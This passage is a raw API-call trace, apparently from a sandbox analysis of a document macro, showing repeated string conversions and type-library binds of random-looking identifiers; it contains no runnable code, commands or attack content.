[0023.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57989d2, cbMultiByte=10, lpWideCharStr=0x475191c, cchWideChar=22 | out: lpWideCharStr="BkUFdGLKEP") returned 10 [0023.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57989e2, cbMultiByte=7, lpWideCharStr=0x47519a6, cchWideChar=16 | out: lpWideCharStr="tZZnVny") returned 7 [0023.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57989f0, cbMultiByte=10, lpWideCharStr=0x4751b3e, cchWideChar=22 | out: lpWideCharStr="kVxyDpBUbe") returned 10 [0023.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798a00, cbMultiByte=7, lpWideCharStr=0x4751c5c, cchWideChar=16 | out: lpWideCharStr="BHmmtxs") returned 7 [0023.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798a0e, cbMultiByte=7, lpWideCharStr=0x4751d74, cchWideChar=16 | out: lpWideCharStr="bVTRGXh") returned 7 [0023.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798a1c, cbMultiByte=7, lpWideCharStr=0x4751e8c, cchWideChar=16 | out: lpWideCharStr="zWtSrLD") returned 7 [0023.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2c66, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="yAPMvhesKK") returned 11 [0023.235] ITypeComp:RemoteBind (in: This=0x2876550, szName="yAPMvhesKK", lHashVal=0x10ec2a, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x272 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x272) returned 0x0 [0023.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2c66, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="yAPMvhesKK") returned 11 [0023.235] ITypeComp:RemoteBind (in: This=0x2875638, szName="yAPMvhesKK", lHashVal=0x10ec2a, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x272 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x272) returned 0x0 [0023.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2c66, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="yAPMvhesKK") returned 11 [0023.235] ITypeComp:RemoteBind (in: This=0x2876778, szName="yAPMvhesKK", lHashVal=0x10ec2a, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x272 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x272) returned 0x0 [0023.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2c66, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="yAPMvhesKK") returned 11 [0023.236] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="yAPMvhesKK", lHashVal=0x10ec2a, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x272 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x272) returned 0x0 [0023.236] CRetailMalloc_Alloc () returned 0x78b3090 [0023.236] IUnknown:Release (This=0x2876548) returned 0x7 [0023.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e03ae, cbMultiByte=18, lpWideCharStr=0x125374, cchWideChar=19 | out: lpWideCharStr="_B_var_yAPMvhesKK") returned 18 [0023.236] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_yAPMvhesKK", lHashVal=0x105a55, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.237] CRetailMalloc_Free () returned 0x1b20201 [0023.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798a30, cbMultiByte=8, lpWideCharStr=0x4752138, cchWideChar=18 | out: lpWideCharStr="YvzBwVhw") returned 8 [0023.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798a3c, cbMultiByte=9, lpWideCharStr=0x4752186, cchWideChar=20 | out: lpWideCharStr="WvbDeNRgm") returned 9 [0023.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798a4c, cbMultiByte=11, lpWideCharStr=0x475220e, cchWideChar=24 | out: lpWideCharStr="HGmxRKpeccm") returned 11 [0023.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798a5e, cbMultiByte=8, lpWideCharStr=0x475232e, cchWideChar=18 | out: lpWideCharStr="GKEXXuEE") returned 8 [0023.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798a6c, cbMultiByte=11, lpWideCharStr=0x4752448, cchWideChar=24 | out: lpWideCharStr="EFdUevzfcdu") returned 11 [0023.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798a7e, cbMultiByte=7, lpWideCharStr=0x4752568, cchWideChar=16 | out: lpWideCharStr="dASKDCw") returned 7 [0023.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798a8c, cbMultiByte=11, lpWideCharStr=0x4752680, cchWideChar=24 | out: lpWideCharStr="UrYngTuwudm") returned 11 [0023.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2c8e, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="YWnXHVmbrSr") returned 12 [0023.237] ITypeComp:RemoteBind (in: This=0x2876550, szName="YWnXHVmbrSr", lHashVal=0x10e800, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x274 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x274) returned 0x0 [0023.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2c8e, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="YWnXHVmbrSr") returned 12 [0023.237] ITypeComp:RemoteBind (in: This=0x2875638, szName="YWnXHVmbrSr", lHashVal=0x10e800, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x274 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x274) returned 0x0 [0023.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2c8e, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="YWnXHVmbrSr") returned 12 [0023.237] ITypeComp:RemoteBind (in: This=0x2876778, szName="YWnXHVmbrSr", lHashVal=0x10e800, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x274 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x274) returned 0x0 [0023.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2c8e, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="YWnXHVmbrSr") returned 12 [0023.238] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="YWnXHVmbrSr", lHashVal=0x10e800, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x274 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x274) returned 0x0 [0023.238] CRetailMalloc_Alloc () returned 0x78b3090 [0023.238] IUnknown:Release (This=0x2876548) returned 0x7 [0023.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e03de, cbMultiByte=19, lpWideCharStr=0x125374, cchWideChar=20 | out: lpWideCharStr="_B_var_YWnXHVmbrSr") returned 19 [0023.238] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_YWnXHVmbrSr", lHashVal=0x10c9e1, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.238] CRetailMalloc_Free () returned 0x1b20201 [0023.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798aa6, cbMultiByte=10, lpWideCharStr=0x4752910, cchWideChar=22 | out: lpWideCharStr="UmBWZzdBLe") returned 10 [0023.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798ab4, cbMultiByte=7, lpWideCharStr=0x4752962, cchWideChar=16 | out: lpWideCharStr="eWAZhNm") returned 7 [0023.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798ac2, cbMultiByte=9, lpWideCharStr=0x47529e6, cchWideChar=20 | out: lpWideCharStr="uhFcwDBzk") returned 9 [0023.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798ad2, cbMultiByte=11, lpWideCharStr=0x4752b02, cchWideChar=24 | out: lpWideCharStr="nHhgBLCkcKV") returned 11 [0023.238] CRetailMalloc_Alloc () returned 0x786d170 [0023.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798ae4, cbMultiByte=9, lpWideCharStr=0x4752c22, cchWideChar=20 | out: lpWideCharStr="RZvXMymAw") returned 9 [0023.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798af4, cbMultiByte=9, lpWideCharStr=0x4752d3e, cchWideChar=20 | out: lpWideCharStr="FadhENfdv") returned 9 [0023.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798b04, cbMultiByte=7, lpWideCharStr=0x4752e5a, cchWideChar=16 | out: lpWideCharStr="SsCaYfh") returned 7 [0023.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2cb6, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="UwWvTmfR") returned 9 [0023.239] ITypeComp:RemoteBind (in: This=0x2876550, szName="UwWvTmfR", lHashVal=0x104845, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x276 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x276) returned 0x0 [0023.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2cb6, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="UwWvTmfR") returned 9 [0023.239] ITypeComp:RemoteBind (in: This=0x2875638, szName="UwWvTmfR", lHashVal=0x104845, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x276 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x276) returned 0x0 [0023.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2cb6, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="UwWvTmfR") returned 9 [0023.239] ITypeComp:RemoteBind (in: This=0x2876778, szName="UwWvTmfR", lHashVal=0x104845, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x276 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x276) returned 0x0 [0023.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2cb6, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="UwWvTmfR") returned 9 [0023.239] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="UwWvTmfR", lHashVal=0x104845, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x276 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x276) returned 0x0 [0023.239] CRetailMalloc_Alloc () returned 0x786b680 [0023.240] IUnknown:Release (This=0x2876548) returned 0x7 [0023.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e040e, cbMultiByte=16, lpWideCharStr=0x125374, cchWideChar=17 | out: lpWideCharStr="_B_var_UwWvTmfR") returned 16 [0023.240] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_UwWvTmfR", lHashVal=0x101fce, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.240] CRetailMalloc_Free () returned 0xef90001 [0023.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798b1a, cbMultiByte=9, lpWideCharStr=0x47530e2, cchWideChar=20 | out: lpWideCharStr="brYLsbAwd") returned 9 [0023.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798b28, cbMultiByte=11, lpWideCharStr=0x4753132, cchWideChar=24 | out: lpWideCharStr="dfbPcNdGrGa") returned 11 [0023.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798b3a, cbMultiByte=10, lpWideCharStr=0x47531be, cchWideChar=22 | out: lpWideCharStr="DDZzwbGpbZ") returned 10 [0023.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798b4a, cbMultiByte=9, lpWideCharStr=0x47532dc, cchWideChar=20 | out: lpWideCharStr="RgvUeegFf") returned 9 [0023.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798b5a, cbMultiByte=11, lpWideCharStr=0x47533f8, cchWideChar=24 | out: lpWideCharStr="dZawxtuHYZA") returned 11 [0023.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798b6c, cbMultiByte=11, lpWideCharStr=0x4753518, cchWideChar=24 | out: lpWideCharStr="svzuRKnVxRt") returned 11 [0023.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798b7e, cbMultiByte=9, lpWideCharStr=0x4753638, cchWideChar=20 | out: lpWideCharStr="DkwNAKdEk") returned 9 [0023.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2cde, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="ypRNFLz") returned 8 [0023.240] ITypeComp:RemoteBind (in: This=0x2876550, szName="ypRNFLz", lHashVal=0x109a61, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x278 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x278) returned 0x0 [0023.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2cde, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="ypRNFLz") returned 8 [0023.240] ITypeComp:RemoteBind (in: This=0x2875638, szName="ypRNFLz", lHashVal=0x109a61, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x278 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x278) returned 0x0 [0023.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2cde, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="ypRNFLz") returned 8 [0023.240] ITypeComp:RemoteBind (in: This=0x2876778, szName="ypRNFLz", lHashVal=0x109a61, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x278 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x278) returned 0x0 [0023.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2cde, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="ypRNFLz") returned 8 [0023.241] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="ypRNFLz", lHashVal=0x109a61, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x278 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x278) returned 0x0 [0023.241] CRetailMalloc_Alloc () returned 0x786b680 [0023.241] IUnknown:Release (This=0x2876548) returned 0x7 [0023.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e043a, cbMultiByte=15, lpWideCharStr=0x125374, cchWideChar=16 | out: lpWideCharStr="_B_var_ypRNFLz") returned 15 [0023.241] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_ypRNFLz", lHashVal=0x108e64, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.241] CRetailMalloc_Free () returned 0xef90001 [0023.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798b96, cbMultiByte=7, lpWideCharStr=0x47538c4, cchWideChar=16 | out: lpWideCharStr="SDXbGkD") returned 7 [0023.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798ba2, cbMultiByte=11, lpWideCharStr=0x4753910, cchWideChar=24 | out: lpWideCharStr="wBcBWbukvMm") returned 11 [0023.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798bb4, cbMultiByte=8, lpWideCharStr=0x475399c, cchWideChar=18 | out: lpWideCharStr="HPMteNZx") returned 8 [0023.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798bc2, cbMultiByte=11, lpWideCharStr=0x4753ab6, cchWideChar=24 | out: lpWideCharStr="VgTWNcbskYD") returned 11 [0023.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798bd4, cbMultiByte=11, lpWideCharStr=0x4753bd6, cchWideChar=24 | out: lpWideCharStr="kRWGaGrebrB") returned 11 [0023.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798be6, cbMultiByte=7, lpWideCharStr=0x4753cf6, cchWideChar=16 | out: lpWideCharStr="zTZskDx") returned 7 [0023.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798bf4, cbMultiByte=8, lpWideCharStr=0x4753e0e, cchWideChar=18 | out: lpWideCharStr="xXSDNkmk") returned 8 [0023.242] CRetailMalloc_Alloc () returned 0x786d398 [0023.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798c02, cbMultiByte=11, lpWideCharStr=0x4753f28, cchWideChar=24 | out: lpWideCharStr="ZkyfVYCCChK") returned 11 [0023.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2c3e, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="nevByfzD") returned 9 [0023.242] ITypeComp:RemoteBind (in: This=0x2876550, szName="nevByfzD", lHashVal=0x106b88, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x270 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x270) returned 0x0 [0023.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2c3e, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="nevByfzD") returned 9 [0023.242] ITypeComp:RemoteBind (in: This=0x2875638, szName="nevByfzD", lHashVal=0x106b88, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x270 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x270) returned 0x0 [0023.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2c3e, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="nevByfzD") returned 9 [0023.242] ITypeComp:RemoteBind (in: This=0x2876778, szName="nevByfzD", lHashVal=0x106b88, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x270 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x270) returned 0x0 [0023.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2c3e, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="nevByfzD") returned 9 [0023.243] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="nevByfzD", lHashVal=0x106b88, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x270 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x270) returned 0x0 [0023.243] CRetailMalloc_Alloc () returned 0x786b680 [0023.243] IUnknown:Release (This=0x2876548) returned 0x7 [0023.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e0466, cbMultiByte=16, lpWideCharStr=0x125374, cchWideChar=17 | out: lpWideCharStr="_B_var_nevByfzD") returned 16 [0023.243] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_nevByfzD", lHashVal=0x104311, wFlags=0x5, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.243] CRetailMalloc_Free () returned 0xef90001 [0023.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798c1c, cbMultiByte=8, lpWideCharStr=0x4761a90, cchWideChar=18 | out: lpWideCharStr="VWpnWtWz") returned 8 [0023.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798c28, cbMultiByte=9, lpWideCharStr=0x4761ade, cchWideChar=20 | out: lpWideCharStr="NcvvvbfEx") returned 9 [0023.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798c38, cbMultiByte=10, lpWideCharStr=0x4761b66, cchWideChar=22 | out: lpWideCharStr="evScFkctbE") returned 10 [0023.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798c48, cbMultiByte=11, lpWideCharStr=0x4761d04, cchWideChar=24 | out: lpWideCharStr="gLYELnNenFZ") returned 11 [0023.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798c5a, cbMultiByte=8, lpWideCharStr=0x4761e24, cchWideChar=18 | out: lpWideCharStr="MspEUzMd") returned 8 [0023.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798c68, cbMultiByte=10, lpWideCharStr=0x4761f3e, cchWideChar=22 | out: lpWideCharStr="htLHGUXFdH") returned 10 [0023.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798c78, cbMultiByte=8, lpWideCharStr=0x476205c, cchWideChar=18 | out: lpWideCharStr="nVKCKsHa") returned 8 [0023.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d2a, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="pLwNywrMpvT") returned 12 [0023.244] ITypeComp:RemoteBind (in: This=0x2876550, szName="pLwNywrMpvT", lHashVal=0x100fc7, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x27c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x27c) returned 0x0 [0023.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d2a, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="pLwNywrMpvT") returned 12 [0023.244] ITypeComp:RemoteBind (in: This=0x2875638, szName="pLwNywrMpvT", lHashVal=0x100fc7, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x27c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x27c) returned 0x0 [0023.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d2a, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="pLwNywrMpvT") returned 12 [0023.244] ITypeComp:RemoteBind (in: This=0x2876778, szName="pLwNywrMpvT", lHashVal=0x100fc7, wFlags=0x3, ppTInfo=0x125330, 